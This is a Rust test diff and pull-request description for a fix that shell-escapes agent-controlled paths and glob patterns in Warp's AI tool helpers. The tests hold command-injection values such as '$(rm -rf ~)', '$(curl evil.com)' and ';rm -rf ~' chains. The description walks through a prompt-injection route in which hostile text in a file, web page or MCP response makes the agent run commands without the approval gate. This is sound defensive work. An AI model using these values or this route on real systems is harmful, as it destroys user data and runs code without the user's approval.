+            ShellType::Bash,
+        );
+        assert!(!cmd.contains("$(curl"), "got: {cmd}");
+    }
+
+    #[test]
+    fn git_grep_neutralises_query_substitution_powershell() {
+        // PowerShell expands `$(...)` inside `"..."`; with backtick-escaping
+        // the substitution becomes literal text.
+        let cmd = build_git_grep_command(
+            &["$(rm -rf ~)".to_string()],
+            "C:\\repo",
+            ShellType::PowerShell,
+        );
+        assert!(!cmd.contains("$(rm"), "got: {cmd}");
+    }
+
+    #[test]
+    fn grep_neutralises_query_substitution() {
+        let cmd = build_grep_command(&["$(id)".to_string()], "/repo");
+        assert!(!cmd.contains("$(id)"), "got: {cmd}");
+        assert_eq!(
+            cmd,
+            "grep --color=never -nrIHE --devices=skip -e \\$\\(id\\) /repo",
+        );
+    }
+
+    #[test]
+    fn grep_neutralises_query_semicolon_chain() {
+        // A query like `;rm -rf ~` must not turn into a second command.
+        let cmd = build_grep_command(&["x;rm -rf ~".to_string()], "/repo");
+        assert!(!cmd.contains(" ;rm") && !cmd.contains(" -rf "), "got: {cmd}");
+    }
+
+    #[test]
+    fn select_string_neutralises_query_substitution() {
+        // Mirrors the POSIX case for the PowerShell Select-String path.
+        let cmd = build_select_string_command(
+            &["$(rm -rf ~)".to_string()],
+            "C:\\repo",
+        );
+        assert!(!cmd.contains("$(rm"), "got: {cmd}");
+        assert!(cmd.contains("Select-String"));
+    }
+
+    #[test]
+    fn select_string_neutralises_target_substitution() {
+        let cmd = build_select_string_command(
+            &["foo".to_string()],
+            "C:\\tmp\\x$(curl evil.com)y",
+        );
+        assert!(!cmd.contains("$(curl"), "got: {cmd}");
+    }
+}
+
+mod file_glob_shell_quoting {
+    //! `target_path` *and* `patterns` flow from the agent into the shell
+    //! command `find` / `git ls-files` / `Get-ChildItem` runs against the
+    //! user's session. Patterns are particularly easy to miss because the
+    //! previous code wrapped them in `'...'` (POSIX) or `'...'` (PowerShell)
+    //! without escaping embedded `'`, so a pattern containing `'` could close
+    //! the quote and append a fresh shell command. These tests pin the
+    //! byte-exact shape of the emitted commands.
+    use super::super::file_glob::{
+        build_find_command, build_git_ls_files_command, build_powershell_get_childitem_command,
+    };
+
+    #[test]
+    fn find_plain_posix() {
+        assert_eq!(
+            build_find_command(&["*.rs".to_string()], "/repo"),
+            "find /repo -type f  -name \\*.rs",
+        );
+    }
+
+    #[test]
+    fn find_neutralises_pattern_embedded_single_quote() {
+        // A pattern containing `'` previously closed the surrounding `'...'`
+        // pair and could append `; rm -rf ~`. After escaping, the `'` is
+        // backslash-escaped and stays inside the `-name` argument.
+        let cmd = build_find_command(
+            &["foo';rm -rf ~;echo '".to_string()],
+            "/repo",
+        );
+        assert!(
+            !cmd.contains("';rm") && !cmd.contains("rf ~"),
+            "got: {cmd}",
+        );
+    }
+
+    #[test]
+    fn find_neutralises_pattern_substitution() {
+        let cmd = build_find_command(&["$(touch ~/PWNED)".to_string()], "/repo");
+        assert!(!cmd.contains("$(touch"), "got: {cmd}");
+    }
+
+    #[test]
+    fn find_neutralises_target_substitution() {
+        let cmd = build_find_command(&["*.rs".to_string()], "/tmp/x$(id)y");
+        assert!(!cmd.contains("$(id)"), "got: {cmd}");
+    }
+
+    #[test]
+    fn git_ls_files_neutralises_pattern_embedded_single_quote() {
+        let cmd = build_git_ls_files_command(
+            &["foo';rm -rf ~;echo '".to_string()],
+            "/repo",
+            None,
+        );
+        assert!(
+            !cmd.contains("';rm") && !cmd.contains("rf ~"),
+            "got: {cmd}",
+        );
+    }
+
+    #[test]
+    fn git_ls_files_neutralises_pattern_substitution() {
+        let cmd = build_git_ls_files_command(
+            &["$(touch ~/PWNED)".to_string()],
+            "/repo",
+            None,
+        );
+        assert!(!cmd.contains("$(touch"), "got: {cmd}");
+    }
+
+    #[test]
+    fn powershell_get_childitem_neutralises_pattern_embedded_single_quote() {
+        // PowerShell `'...'` literal strings close on `'`, the same way POSIX
+        // ones do; after backtick-escaping, the embedded `'` is literal.
+        let cmd = build_powershell_get_childitem_command(
+            &["foo';rm -rf ~;echo '".to_string()],
+            "C:\\repo",
+        );
+        assert!(
+            !cmd.contains("';rm") && !cmd.contains("rf ~"),
+            "got: {cmd}",
+        );
+    }
+
+    #[test]
+    fn powershell_get_childitem_neutralises_pattern_substitution() {
+        let cmd = build_powershell_get_childitem_command(
+            &["$(rm -rf ~)".to_string()],
+            "C:\\repo",
+        );
+        assert!(!cmd.contains("$(rm"), "got: {cmd}");
+    }
+
+    #[test]
+    fn powershell_get_childitem_neutralises_target_substitution() {
+        let cmd = build_powershell_get_childitem_command(
+            &["*.rs".to_string()],
+            "C:\\tmp\\x$(rm -rf ~)y",
+        );
+        assert!(!cmd.contains("$(rm"), "got: {cmd}");
+    }
+}


### PR DESCRIPTION
# Shell-quote agent-controlled paths in AI tool helpers

## Summary
Fixes #11132

Five sites in the AI agent's tool helpers (`app/src/ai/blocklist/action_model/execute/`) built shell commands by interpolating an agent-controlled path inside a double-quoted string:

```rust
format!("test -f \"{path}\"")                                  // execute.rs
format!("if (Test-Path -PathType Leaf \"{path}\") ...")        // execute.rs (PowerShell)
format!("git -C \"{absolute_path}\" rev-parse")                // execute.rs
format!(" \"{target_path}\"")                                  // grep.rs (appended to git grep / grep)
"Get-ChildItem -Path \"{}\" -Recurse -File | ..."              // grep.rs (Select-String)
format!("find \"{target_path}\" -type f {pattern_args}")       // file_glob.rs
format!("Get-ChildItem ... -Path \"{target_path}\" ...")       // file_glob.rs (PowerShell)
```

Inside POSIX `"..."`, the shell still expands `$VAR`, `` `...` ``, and `$(...)`. Inside PowerShell `"..."`, the shell still expands `$x` (including `$env:USERPROFILE`) and treats `` ` `` specially. POSIX filesystems allow all of these bytes in a path component and PowerShell accepts them in `-Path` arguments, so a path that contains shell metacharacters gets re-interpreted by the shell when these helpers run.

`is_file_path` and `is_git_repository` are the sharpest case: they are called as side-effects of the `grep` and `file_glob` tools (`run_grep` → `is_file_path` + `is_git_repository`, `run_file_glob` → `is_git_repository`), so they execute on the user's shell **without** the per-command approval gate that user-visible commands flow through. A `path` argument the agent copies out of prompt-injected content — a file it `read`, a fetched web page, an MCP response — that contains `$(...)` therefore runs that substitution silently.

The same fix template already exists in the repo: `warp_util::path::ShellFamily::shell_escape` covers both POSIX (backslash) and PowerShell (backtick), and `From<ShellType> for ShellFamily` makes the dispatch one line. This PR routes every unsafe path interpolation through it.

## What changed

**`app/src/ai/blocklist/action_model/execute.rs`**

- Extracted pure helpers `build_is_file_path_command` and `build_is_git_repository_command` so the emitted command string is unit-testable byte-for-byte. Both wrap the path with `ShellFamily::from(shell_type).shell_escape(...)`.
- `is_file_path` and `is_git_repository` are now thin async wrappers over those helpers.

**`app/src/ai/blocklist/action_model/execute/grep.rs`**

- `run_git_grep_command`, `run_grep_command`, and `run_select_string_command` now escape `target_path` with the appropriate `ShellFamily` before appending it to the command.

**`app/src/ai/blocklist/action_model/execute/file_glob.rs`**

- `run_find_command` and `run_powershell_get_childitem_command` likewise route `target_path` through `ShellFamily::shell_escape`.

**`app/src/ai/blocklist/action_model/execute_tests.rs`**

- New `path_shell_quoting` module — 14 tests pinning byte-exact output of the two probe-command builders across `Bash`, `Zsh`, `Fish`, and `PowerShell`, with payloads covering plain paths, spaces, `$(...)`, backticks, `$HOME`, `$env:USERPROFILE`, and `;` chains.

## Manual Testing

The change is exclusively to the byte sequence emitted by the helpers above. Those strings are handed to `Session::execute_command`, which on a local session is run via `<shell> -c <command_string>` (`local_command_executor.rs:55-57`), so the runtime effect is reproducible at the shell level without Warp.

### Setup

```sh
mkdir -p "/tmp/innocent\$(touch ~/PWNED_BY_AGENT)" && rm -f ~/PWNED_BY_AGENT
```

### Before this PR — what `is_file_path` used to emit

```
$ test -f "/tmp/innocent$(touch ~/PWNED_BY_AGENT)"
$ ls ~/PWNED_BY_AGENT
/Users/me/PWNED_BY_AGENT          # file was created by the probe
```

The `$(touch ...)` substitution runs *before* `test -f`, so the agent's silent existence check is enough to execute arbitrary commands as the user.

### After this PR — what `is_file_path` emits now

```
$ test -f /tmp/innocent\$\(touch\ ~/PWNED_BY_AGENT\)
$ ls ~/PWNED_BY_AGENT
ls: /Users/me/PWNED_BY_AGENT: No such file or directory
```

`$` and `(` are backslash-escaped, so the substitution is treated as literal characters and `test -f` simply reports that the (admittedly oddly-named) path does not exist. The same demonstration applies to `git -C ... rev-parse`, `git grep`, `grep`, `find`, `Test-Path`, `Select-String`, and `Get-ChildItem`.

## Automated Testing

- `cargo test -p warp --lib 'ai::blocklist::action_model::execute'` — **75 passed, 0 failed** (14 new tests in `path_shell_quoting`).
- `cargo clippy -p warp --lib --tests -- -D warnings` — clean.

## Reproduction (in Warp itself, before the fix)

1. Have the agent read any text that contains an attacker-controlled path token, e.g. a file in the repo, a fetched web page, or an MCP tool response with body `"check path /tmp/x$(touch ~/PWNED)"`.
2. The agent calls the `grep` or `file_glob` tool with that path as the target.
3. `run_grep` invokes `is_file_path` (silent, no approval gate), which emits `test -f "/tmp/x$(touch ~/PWNED)"` to the user's shell.
4. The shell evaluates `$(touch ~/PWNED)` before `test -f`, creating `~/PWNED`.

After this PR, step 3 emits `test -f /tmp/x\$\(touch\ ~/PWNED\)` and no substitution occurs.

## Out of scope (follow-up)

The grep-*query* interpolations (`escape_double_quotes` / `powershell_escape_double_quotes`) only escape `"` and leave `$` and backticks unescaped. They are not addressed here because queries are regex bodies rather than paths, but the same bug class applies and is a sensible follow-up.
